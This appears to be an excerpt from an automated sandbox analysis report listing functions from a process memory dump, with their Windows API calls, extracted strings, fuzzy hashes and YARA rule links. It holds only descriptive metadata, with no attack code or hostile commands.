                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                • String ID:
                • API String ID: 3869813825-0
                • Opcode ID: 98f3b0c338d24746c81f59f2fea7662f6fa5c6b073d3f1dac3ed70b618b02258
                • Instruction ID: 569f5c9c37333ceb7f5ce444f726b5d0d4fbc185150aa31dd550c28815289fec
                • Opcode Fuzzy Hash: 98f3b0c338d24746c81f59f2fea7662f6fa5c6b073d3f1dac3ed70b618b02258
                • Instruction Fuzzy Hash: 52618E71A00705ABEB20DFA8CD89FABB7F8BB84704F104919E64697690D7B8F944CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00462095, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 377timeCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 004620BD
                • _memset.LIBCMT ref: 004620DB
                • GetLocalTime.KERNEL32(?), ref: 0046225C
                • __swprintf.LIBCMT ref: 00462273
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0047BF48), ref: 004624A6
                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0047BF48), ref: 004624C0
                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0047BF48), ref: 004624DA
                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0047BF48), ref: 004624F4
                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0047BF48), ref: 0046250E
                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0047BF48), ref: 00462528
                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0047BF48), ref: 00462542
                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0047BF48), ref: 0046255C
                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0047BF48), ref: 00462576
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FolderPath$_memset$LocalTime__swprintf
                • String ID: %.3d
                • API String ID: 645292623-986655627
                • Opcode ID: a5ea3ad103ff3256a7e8ca012b0ea9e6df87f03bf6ab6db430c16b3067ee1ce3
                • Instruction ID: c10035661ebfba78fcc0a7bd5b2f4e6d651683768d20cb6519ab7f92e1ed3e35
                • Opcode Fuzzy Hash: a5ea3ad103ff3256a7e8ca012b0ea9e6df87f03bf6ab6db430c16b3067ee1ce3
                • Instruction Fuzzy Hash: 46C1FD3265420CABD720FB60DD86FFE7378FB44701F4044AAFA09A70D1EBB59A458B65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00445755, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 220COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CreateDestroy
                • String ID: ,$dNG$tooltips_class32
                • API String ID: 1109047481-1612692394
                • Opcode ID: 70202940d3e1f40b7202d2dc7c90e9de4b88c4a29169812647eebcb4cf4ee71a
                • Instruction ID: 18b16edc9481ffe0197d0ac9d89c54e4cb3d47c6b31312cd1289667fbb99736e
                • Opcode Fuzzy Hash: 70202940d3e1f40b7202d2dc7c90e9de4b88c4a29169812647eebcb4cf4ee71a
                • Instruction Fuzzy Hash: 1071B375640208AFEB20CF5CDC85FBA77B8EB59710F10812BF9449B351D674AD52CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0045E7D4, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 207windowCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 0045E7EF
                • GetMenuItemInfoW.USER32 ref: 0045E877
                • GetMenuItemCount.USER32 ref: 0045E90B
                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 0045E99F
                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 0045E9A8
                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 0045E9B1
                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045E9BA
                • GetMenuItemCount.USER32 ref: 0045E9C3
                • SetMenuItemInfoW.USER32 ref: 0045E9FB
                • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045EA05
                • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045EA0F
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045EA25
                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 0045EA32
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                • String ID: 0
                • API String ID: 3993528054-4108050209
                • Opcode ID: 0c2c31472480ce76f8833f589b86f057a79d4b67fcd6deadfaea3a94ba31c9ef
                • Instruction ID: 5ab3c8467b15411f44a7aa092a2c2ed17b6b2dc28b41f69ba3d6732f2980a5c6
                • Opcode Fuzzy Hash: 0c2c31472480ce76f8833f589b86f057a79d4b67fcd6deadfaea3a94ba31c9ef
                • Instruction Fuzzy Hash: 1A713570604304BBE724DB65CC45F5BB7A4AF44724F30471FF9A5672D2C7B8A9488B19
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00421BD5, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00421BF6
                • __swprintf.LIBCMT ref: 00421C1B
                • _wcslen.LIBCMT ref: 00421C27
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00421C54
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 2192556992-3457252023
                • Opcode ID: 0ae0fb815f0cfb024f396cde450890ee975165ec3a4fc6832aaa864f52df95ed
                • Instruction ID: 4fbf07740a2e934c14a0455698af2ed71f37f692f4b6b48b256f1709a0419f9e
                • Opcode Fuzzy Hash: 0ae0fb815f0cfb024f396cde450890ee975165ec3a4fc6832aaa864f52df95ed
                • Instruction Fuzzy Hash: CC412A72740318A6D730DB64EC45FDB73ACFF54700F4081AAFA08A2191E7B49A848BD4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043B918, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicoll
                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                • API String ID: 3832890014-4202584635
                • Opcode ID: b7ed2594dd3b001d908033011223467baadb2129e0162e9956eb3fe864ec0bbd
                • Instruction ID: 0c243bb2cc05cc7b0705c0636fd78e2bb816ecc59b93e7a78a98be643766ba87
                • Opcode Fuzzy Hash: b7ed2594dd3b001d908033011223467baadb2129e0162e9956eb3fe864ec0bbd
                • Instruction Fuzzy Hash: 3C1129A264421512EA2031667C03BEB629CCF1139BF04503BFE0CE16C5F76EEA2082ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00456DDB, Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 310COMMON
                Download Yara Rule
                APIs
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00456EB0
                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00456F29
                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00456FBE
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00456FEA
                • _memmove.LIBCMT ref: 00457005
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0045700E
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 0045702B
                • _memmove.LIBCMT ref: 004570B9
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 0045710E
                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 004570F8
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • SafeArrayUnaccessData.OLEAUT32(00469A0A), ref: 00456F95
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • SafeArrayUnaccessData.OLEAUT32(00469A0A), ref: 0045717D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                • String ID: qE
                • API String ID: 2170234536-3567479092
                • Opcode ID: a9a27f4269ccc9b6dea3cbb247b2dde0f4037fe3ee6171d14155b9322592569a
                • Instruction ID: 91ebd53e07e4f121d8a84f47ecdcf7f867486f631cc5a1e087c462953be3f449
                • Opcode Fuzzy Hash: a9a27f4269ccc9b6dea3cbb247b2dde0f4037fe3ee6171d14155b9322592569a
                • Instruction Fuzzy Hash: 2BB114756002059FD710CF58D884BAAB7B5FF48305F14807EEE499B392D73AE889CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00457BBF, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 227windowsleepCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 00457BDD
                • GetMenuItemInfoW.USER32 ref: 00457C43
                • SetMenuItemInfoW.USER32 ref: 00457C7C
                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 00457C8E
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: InfoItemMenu$Sleep_memset
                • String ID: 0
                • API String ID: 1504565804-4108050209
                • Opcode ID: b51fe25ef61f1505d5ed7e0ea49914695a1a46618b735ff984dc4f3de185a6b1
                • Instruction ID: fb474e14f3e19baa0fd371a117685a4bfafee924f3989277fd26a212e7a64149
                • Opcode Fuzzy Hash: b51fe25ef61f1505d5ed7e0ea49914695a1a46618b735ff984dc4f3de185a6b1
                • Instruction Fuzzy Hash: AF71D072504248ABDB20CF55EC49FAF7BB8FB81315F10856EFD0597282C774A949CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004505C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00417F37,?,0000138C,?,00000001,?,?,?), ref: 004505F5
                • LoadStringW.USER32(00000000,?,00417F37,?), ref: 004505FC
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00417F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0045061C
                • LoadStringW.USER32(00000000,?,00417F37,?), ref: 00450623
                • __swprintf.LIBCMT ref: 00450661
                • __swprintf.LIBCMT ref: 00450679
                • _wprintf.LIBCMT ref: 0045072D
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00450746
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 3631882475-2268648507
                • Opcode ID: 59f89ac32b824de5959b2c6a66f3688c05ee7bea0033cf391bf4eb2ac52b5a20
                • Instruction ID: 7d6448c3bf3b915e0385319cf68e08b6cd8eefd2119ea76836d77845acbfe474
                • Opcode Fuzzy Hash: 59f89ac32b824de5959b2c6a66f3688c05ee7bea0033cf391bf4eb2ac52b5a20
                • Instruction Fuzzy Hash: F5414BB1A1020DABDB00FBA1DC869FE777CEF44751F54402AFA087B152DA786A45CB74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00421329, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 0042139D
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004213AE
                • CreateCompatibleDC.GDI32(00000000), ref: 004213B8
                • SelectObject.GDI32(00000000,?), ref: 004213C5
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042142B
                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00421464
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                • String ID: (
                • API String ID: 3300687185-3887548279
                • Opcode ID: c4881a1f87a25b2b4704683e99afd47eb1892ee8f665341d0115eb99e4666fb3
                • Instruction ID: c27b207e969d12d3a9f7e98e0331b914ac94439705876a42d0fbec8d915c4602
                • Opcode Fuzzy Hash: c4881a1f87a25b2b4704683e99afd47eb1892ee8f665341d0115eb99e4666fb3
                • Instruction Fuzzy Hash: 10516A71A00249AFDB14CFA8D884FAFBBB9EF48310F10842DFA5997250D7B4A940CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004229F2, Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                • String ID:
                • API String ID: 461458858-0
                • Opcode ID: ac603629dfcda670b0ec8800f603c9b5d8eaa2f6336dbf8d8106c8a905e62cca
                • Instruction ID: c0d0894768024f3e06fd419bd3a058013d4eabd756b1edee2077394251badbe2
                • Opcode Fuzzy Hash: ac603629dfcda670b0ec8800f603c9b5d8eaa2f6336dbf8d8106c8a905e62cca
                • Instruction Fuzzy Hash: B7417176D1121475CF10EFA6C9869DFB7B8EF45304F80846BE905B31A1F7B4A68483EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004485C8, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 135registryshareCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • _memset.LIBCMT ref: 00448660
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00448698
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004486B5
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 004486D3
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00448701
                • CLSIDFromString.OLE32(?,?), ref: 0044872A
                • RegCloseKey.ADVAPI32(000001FE), ref: 00448736
                • RegCloseKey.ADVAPI32(?), ref: 0044873C
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$$dNG
                • API String ID: 2901625445-2203316046
                • Opcode ID: c49d044659b48f98b84f8544ba0f5aac6b4956a14e0f66f1e0c935131e330ab8
                • Instruction ID: 19ee770a2ea71da6715cace33edd7346b12810e99b71084e889d08645325a3b5
                • Opcode Fuzzy Hash: c49d044659b48f98b84f8544ba0f5aac6b4956a14e0f66f1e0c935131e330ab8
                • Instruction Fuzzy Hash: 84414576D0020D9BDB15EFA4EC45AEEB3B9EF44340F10C02AFA15AB251DB74A905CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042000A, Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00420030
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0042004B
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00420056
                • GlobalLock.KERNEL32 ref: 00420063
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00420072
                • GlobalUnlock.KERNEL32(00000000), ref: 00420079
                • CloseHandle.KERNEL32(00000000), ref: 00420080
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0042008D
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004729F8,?), ref: 004200AB
                • GlobalFree.KERNEL32 ref: 004200BD
                • GetObjectW.GDI32(?,00000018,?), ref: 004200E4
                • CopyImage.USER32 ref: 00420115
                • DeleteObject.GDI32(?), ref: 0042013D
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00420154
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3969911579-0
                • Opcode ID: 538d2245417ca2975d6ef260b0331c7957215ec2543ab879d7a2117ab92bafc7
                • Instruction ID: 1076b22a35a511b89b210f2abe23af9eb2e68b820b8844e4ba5ebcbd51014b06
                • Opcode Fuzzy Hash: 538d2245417ca2975d6ef260b0331c7957215ec2543ab879d7a2117ab92bafc7
                • Instruction Fuzzy Hash: 4A416D75600218AFE710DF64EC89FAAB7B8FF48710F108155FA09EB291D7B5AD41CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00435AEA, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicoll$ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 3125838495-3381328864
                • Opcode ID: 4b6cd97daf92257e8087462cb76ee79e279ac703690de1ac5c1545e8b7795b49
                • Instruction ID: e531c6f6e00346f312fedb532e8946007dee60533452d7a592a740c9e647bd4d
                • Opcode Fuzzy Hash: 4b6cd97daf92257e8087462cb76ee79e279ac703690de1ac5c1545e8b7795b49
                • Instruction Fuzzy Hash: C9112071A54300BBEB106A55AC07EB7B3EC8B58712F005127FD04E7280F6BCBD1146A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00439112, Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004391FD
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00439210
                • CharNextW.USER32(?,?,?,000000FF,?), ref: 00439242
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0043925A
                • SendMessageW.USER32(?,?,00000000,?), ref: 0043928B
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004392A2
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004392B5
                • SendMessageW.USER32(?,00000402,?), ref: 004392F2
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00439366
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004393D0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                • Opcode ID: 125741fae576c8aa471dbba185b021c883f813b159d69eb5299210c3a57e8b4e
                • Instruction ID: ee06630ac26e27ee7bbf3ba441383b4ee41aea3b096f9ec86c3220aceb37e905
                • Opcode Fuzzy Hash: 125741fae576c8aa471dbba185b021c883f813b159d69eb5299210c3a57e8b4e
                • Instruction Fuzzy Hash: B081B271A00109ABEB10DF95DC85FFF7778EB59720F10816AFA14AA2C0D7B99D418BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044E724, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0044E76C
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0044E78D
                • __swprintf.LIBCMT ref: 0044E7E4
